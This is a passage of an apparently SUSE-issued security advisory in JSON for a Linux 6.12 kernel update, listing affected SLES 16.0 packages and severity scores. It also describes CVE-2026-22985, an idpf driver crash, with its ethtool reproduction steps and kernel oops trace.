"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22984"
},
{
"cve": "CVE-2026-22985",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22985"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL pointer crash on early ethtool operations\n\nThe RSS LUT is not initialized until the interface comes up, causing\nthe following NULL pointer crash when ethtool operations like rxhash on/off\nare performed before the interface is brought up for the first time.\n\nMove RSS LUT initialization from ndo_open to vport creation to ensure LUT\nis always available. This enables RSS configuration via ethtool before\nbringing the interface up. Simplify LUT management by maintaining all\nchanges in the driver\u0027s soft copy and programming zeros to the indirection\ntable when rxhash is disabled. Defer HW programming until the interface\ncomes up if it is down during rxhash and LUT configuration changes.\n\nSteps to reproduce:\n** Load idpf driver; interfaces will be created\n\tmodprobe idpf\n** Before bringing the interfaces up, turn rxhash off\n\tethtool -K eth2 rxhash off\n\n[89408.371875] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[89408.371908] #PF: supervisor read access in kernel mode\n[89408.371924] #PF: error_code(0x0000) - not-present page\n[89408.371940] PGD 0 P4D 0\n[89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[89408.372052] RIP: 0010:memcpy_orig+0x16/0x130\n[89408.372310] Call Trace:\n[89408.372317] \u003cTASK\u003e\n[89408.372326] ? idpf_set_features+0xfc/0x180 [idpf]\n[89408.372363] __netdev_update_features+0x295/0xde0\n[89408.372384] ethnl_set_features+0x15e/0x460\n[89408.372406] genl_family_rcv_msg_doit+0x11f/0x180\n[89408.372429] genl_rcv_msg+0x1ad/0x2b0\n[89408.372446] ? __pfx_ethnl_set_features+0x10/0x10\n[89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10\n[89408.372482] netlink_rcv_skb+0x58/0x100\n[89408.372502] genl_rcv+0x2c/0x50\n[89408.372516] netlink_unicast+0x289/0x3e0\n[89408.372533] netlink_sendmsg+0x215/0x440\n[89408.372551] __sys_sendto+0x234/0x240\n[89408.372571] __x64_sys_sendto+0x28/0x30\n[89408.372585] x64_sys_call+0x1909/0x1da0\n[89408.372604] do_syscall_64+0x7a/0xfa0\n[89408.373140] ? clear_bhb_loop+0x60/0xb0\n[89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[89408.378887] \u003c/TASK\u003e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
